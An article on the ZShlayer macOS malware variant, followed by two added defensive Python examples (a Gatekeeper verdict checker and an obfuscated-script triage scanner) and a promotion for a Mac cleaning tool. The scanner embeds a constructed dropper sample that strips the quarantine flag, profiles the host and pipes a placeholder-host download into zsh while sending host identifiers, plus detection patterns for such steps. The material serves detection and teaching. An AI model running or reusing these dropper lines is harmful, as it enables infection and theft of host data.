Shlayer is a persistent macOS malware family that has infected millions of Mac users to date. Its operators have shifted to scripting languages as their infection vector, running script-based campaigns that both deliver the threat and execute it on the system.
Shlayer is again a cause for concern because its operators have managed to abuse Apple’s macOS notarization service. To do so, the malware used a “Mach-O” binary to execute a “Bash” shell script in memory. Since macOS Catalina Apple’s default interactive shell is Zsh rather than Bash, but both interpreters still ship with the OS, so a script payload in either language runs without anything extra being installed.
At the same time the attackers were looking for ways to bypass Apple’s static signature checks and eventually drop the malware on macOS.
Consequently, a new Shlayer variant was found deploying heavily obfuscated “Zsh” scripts to evade security detection. The researchers at SentinelOne who discovered it named the variant ZShlayer.
- The variant uses highly obfuscated Zsh scripts to bypass security tools;
- ZShlayer poses as a standard Apple application bundled inside a .dmg file;
- In that form it passed Apple’s notarization checks and, once on the system, began delivering a flood of unwanted ads and pop-ups.
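Because the whole trick is that the bundle looks like an ordinary, notarized Apple application, the first thing a practitioner wants is a reliable way to read Gatekeeper’s actual verdict for a downloaded bundle. The following is an added example, not code from SentinelOne or from the page: it wraps `spctl --assess --type execute -vv` (Apple’s Gatekeeper assessment tool, macOS only) and parses its verdict lines into a small record. The parsing function is pure, so it can be exercised on captured output on any platform; the bundle paths and signing identities in the sample output are made up.

```python
"""Gatekeeper / notarization check for a macOS app bundle (added example)."""
import platform
import re
import subprocess
import sys
from dataclasses import dataclass


@dataclass
class GatekeeperVerdict:
    accepted: bool     # Gatekeeper would let the bundle launch
    source: str        # e.g. "Notarized Developer ID", "Developer ID", "Unnotarized Developer ID"
    origin: str        # signing identity spctl reports, if any
    notarized: bool    # accepted AND the source line says a notarization ticket was found

    def summary(self) -> str:
        if self.notarized:
            return "notarized (Apple scanned this exact signature; that is not proof the app is benign)"
        if self.accepted:
            return f"accepted but not notarized (source={self.source!r})"
        return f"rejected (source={self.source!r})"


def classify_spctl_output(text: str) -> GatekeeperVerdict:
    """Parse the output of `spctl --assess --type execute -vv <App.app>`.

    On macOS 10.15+ the tool prints lines of the form
        /path/App.app: accepted
        source=Notarized Developer ID
        origin=Developer ID Application: Vendor (TEAMID)
    A signed but un-notarized app reports source=Developer ID, and one that
    Gatekeeper refuses may be reported as rejected with
    source=Unnotarized Developer ID.
    """
    accepted = re.search(r":\s*accepted\b", text) is not None
    src = re.search(r"^source=(.+)$", text, re.M)
    org = re.search(r"^origin=(.+)$", text, re.M)
    source = src.group(1).strip() if src else ""
    origin = org.group(1).strip() if org else ""
    notarized = accepted and source.lower().startswith("notarized")
    return GatekeeperVerdict(accepted, source, origin, notarized)


def assess_app(bundle_path: str) -> GatekeeperVerdict:
    """Run spctl against a bundle. Only works on macOS; spctl writes its verdict to stderr."""
    if platform.system() != "Darwin":
        raise RuntimeError("spctl is only available on macOS")
    proc = subprocess.run(
        ["spctl", "--assess", "--type", "execute", "-vv", bundle_path],
        capture_output=True, text=True, check=False,
    )
    return classify_spctl_output(proc.stdout + proc.stderr)


if __name__ == "__main__":
    for path in sys.argv[1:]:
        print(path, "->", assess_app(path).summary())
```

Run it as `python3 gatekeeper_check.py /Applications/Something.app`. A “notarized” verdict only means Apple’s automated scan saw this exact signed bundle; as the article shows, that is not the same as the bundle being safe, so treat the result as one input to triage, not as a clearance.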
The ZShlayer Stages
Once in, the malware runs a chain of shell scripts (Zsh in this variant), each stage unpacking the next, before the final payload is dropped. Along the way it collects system information such as the session UID, machine ID and OS version.
ZShlayer then contacts a server controlled by its authors at http://dqb2corklaq0k.cloudfront.net/18.104.22.168 and exfiltrates the collected information, after which it delivers the final payloads.
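Static signatures fail against this variant precisely because each stage is an opaque blob of obfuscated script text, so triage has to look at what the script does rather than at its bytes: which interpreter it asks for, whether it hands decoded data to eval, whether it strips the quarantine flag, profiles the host (UID, machine ID, OS version) and pipes something fetched from the network into a shell. The following is an added example, not SentinelOne’s detection logic and not a real ZShlayer sample: a small heuristic that scans a script, base64-decodes any long quoted literal it finds, re-scans the decoded stage, and reports indicators and URLs. The two-stage sample script is constructed for the demonstration (example-cdn.invalid is a placeholder host), and the indicator patterns and entropy threshold are assumptions.

```python
"""Heuristic triage of an obfuscated shell/zsh dropper (added example, constructed sample)."""
import base64
import math
import re
from collections import Counter
from typing import Dict, List, Tuple

# Constructed second stage. It mimics the behaviour the article describes (profile the host,
# beacon the values, pull the next payload into a shell); the host is a placeholder.
_STAGE2 = r'''
uid=$(id -u)
mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}')
osv=$(sw_vers -productVersion)
xattr -d com.apple.quarantine "$0" 2>/dev/null
curl -s "http://example-cdn.invalid/stage3?u=$uid&m=$mid&v=$osv" | zsh
'''

# Constructed first stage: all a static scanner sees is a zsh shebang, one opaque string
# and an eval. None of the strings of the real behaviour appear in clear text.
_BLOB = base64.b64encode(_STAGE2.encode()).decode()
SAMPLE_SCRIPT = "#!/bin/zsh\n" + f'typeset _k="{_BLOB}"\n' + 'eval "$(echo "$_k" | base64 -D)"\n'

# Each rule is (indicator name, pattern). Patterns and thresholds are assumptions for the demo.
_RULES: List[Tuple[str, re.Pattern]] = [
    ("zsh-interpreter", re.compile(r"^#!.*\bzsh\b|\bzsh\s+-c\b", re.M)),
    ("eval-of-command-substitution", re.compile(r"\beval\s+\"?\$\(")),
    ("inline-decoder", re.compile(r"\bbase64\s+(-D|-d|--decode)\b|\bopenssl\s+enc\s+-d\b")),
    ("quarantine-bypass", re.compile(r"\bxattr\s+(-d\s+com\.apple\.quarantine|-c)\b")),
    ("host-profiling", re.compile(r"\bsw_vers\b|\bIOPlatformUUID\b|\bid\s+-u\b")),
    ("network-fetch-to-shell", re.compile(r"\bcurl\b[^\n|]*\|\s*(zsh|bash|sh)\b")),
]
_B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{64,}={0,2})[\"']")
_URL = re.compile(r"https?://[^\s\"'|]+")
_ENTROPY_THRESHOLD = 4.5  # bits/char; base64 of real text is usually well above this


def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def _decode_blobs(text: str) -> List[str]:
    """Base64-decode every long quoted literal that decodes to valid UTF-8."""
    out = []
    for m in _B64_LITERAL.finditer(text):
        try:
            out.append(base64.b64decode(m.group(1), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return out


def triage_script(text: str, max_stages: int = 8) -> Dict[str, object]:
    """Scan a script and every stage it unpacks; return indicators, URLs and decoded stages."""
    indicators: List[str] = []
    urls: List[str] = []
    stages = [text]
    for stage in stages:  # the list grows while iterating; Python picks up appended stages
        for name, rx in _RULES:
            if name not in indicators and rx.search(stage):
                indicators.append(name)
        if "high-entropy-literal" not in indicators and any(
            shannon_entropy(m.group(1)) > _ENTROPY_THRESHOLD for m in _B64_LITERAL.finditer(stage)
        ):
            indicators.append("high-entropy-literal")
        for u in _URL.findall(stage):
            if u not in urls:
                urls.append(u)
        if len(stages) < max_stages:
            stages.extend(_decode_blobs(stage))
    return {"indicators": indicators, "urls": urls, "stages": stages[1:], "score": len(indicators)}


if __name__ == "__main__":
    result = triage_script(SAMPLE_SCRIPT)
    print("score:", result["score"])
    for ind in result["indicators"]:
        print(" -", ind)
    print("urls:", result["urls"])
```

The score is a triage aid, not a verdict: a packaging script can legitimately use base64, and a real dropper may layer XOR or `openssl enc` on top of base64, so the decoder step would need extending per family. The useful part is the combination: an opaque literal, an eval of decoded data, and host profiling followed by a network fetch into a shell, all in one small script, is exactly the shape the article describes.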
The original Shlayer came to light in February 2018 and was distributed aggressively as fake Adobe Flash Player updates; the fake updater conceals the malicious payload, which then infects the Mac.
ZShlayer, for its part, may spread its payload bundled with cracked or pirated software, so users should avoid downloading pirated software or freeware from third-party platforms.
Why does ZShlayer pose a real threat?
The researchers say the ZShlayer campaigns could evolve into a dangerous threat for Mac users, since the variant was able to abuse Apple’s notarization service and slip past security tools.
ZShlayer’s primary purpose is to drop and install the Shlayer malware on the target system. Because the dropper does not share the signature of the original Shlayer and presents itself as a standard Apple application, scanners looking for the known Shlayer signatures do not flag it, which makes silent delivery easy.
Fortunately, ZShlayer is not yet being distributed at scale. Users should avoid downloading unwanted or pirated software from third-party sources or untrustworthy websites and instead use the Mac App Store.
Also, install a reputable anti-malware program so that any unwanted program is detected as soon as it is installed.
How To Scan For Pirated Or Unwanted Software On Your Mac
Combo Cleaner is a security suite for macOS developed by RCS LT. It includes an anti-virus scanner and system optimization tools such as a disk cleaner, duplicate file finder, application uninstaller and privacy scanner, plus 24/7 customer support.
How to Install and Scan with Combo Cleaner
1. Download “Combo Cleaner”;
2. Once the download completes, double-click the downloaded file;
3. When the window opens, drag the Combo Cleaner icon onto the “Applications” folder icon;
4. Open “Launchpad” and click the “Combo Cleaner” icon;
5. This starts the Combo Cleaner installation and updates its virus definitions; once done, Combo Cleaner launches;
6. Click the “Antivirus” tab and choose a scan type: Quick, Full or Custom (Full is recommended for the first scan);
7. Let the scan complete; it lists all threats found. Click “Remove All Threats”;
8. After removing the threats, click “Uninstaller” to find and remove any unwanted programs. Select the program and its related files from the list, then click “Remove Selected Items”.